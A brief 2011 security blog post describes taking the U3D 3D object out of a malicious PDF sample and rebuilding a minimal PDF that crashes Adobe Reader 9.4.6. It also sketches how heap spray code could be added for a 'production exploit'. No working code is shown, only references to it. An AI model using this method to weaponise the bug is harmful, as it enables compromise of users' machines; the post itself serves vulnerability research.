• Recycling U3D Object Contents

    by  • December 7, 2011 • Uncategorized

    This is a super short post, but I wanted to put it out there for those attempting to identify the specific bug and trigger for the exploit. My theory is that object 10 (see my earlier post) is the whole show. In other words, as long as you have the U3D content in your document, it should in theory trigger the bug. I believe this because the JavaScript merely functions as a heap spray and then makes a call to a specific page within the document. This page contains the annotation reference to the 3D content and therefore causes it to display. To merely display a page, you don’t need JavaScript. 

    To recycle content, we must first go steal it. I took the sample I had, loaded it in peep and then saved the contents to a file. You can download the U3D raw object content from here. I then used Didiers make PDF tool and hardcoded the values I knew needed to exist. This mainly consisted of the single page, the 3D definition and then the actual 3D content. 

    I executed the output file on Windows XP SP3 running Adobe 9.4.6 and was able to get a successful crash (doesn’t bypass DEP). Obviously this is not a working exploit, but it does show that there is potential to throw your own heap spray code into the mix and gain execution. A few things to point out before you get too excited though. OpenAction is not required because we only have one page. It would be required however if we were to include JavaScript, so at the end of the day, a few things will need to be put back for a production exploit though I do think one page is all you need assuming you time your spray properly with the 3D render. 

    Here is the code to generate the test document I have (seriously, it’s horrible):

    Object 10 U3D decoded contents

    Sample generated document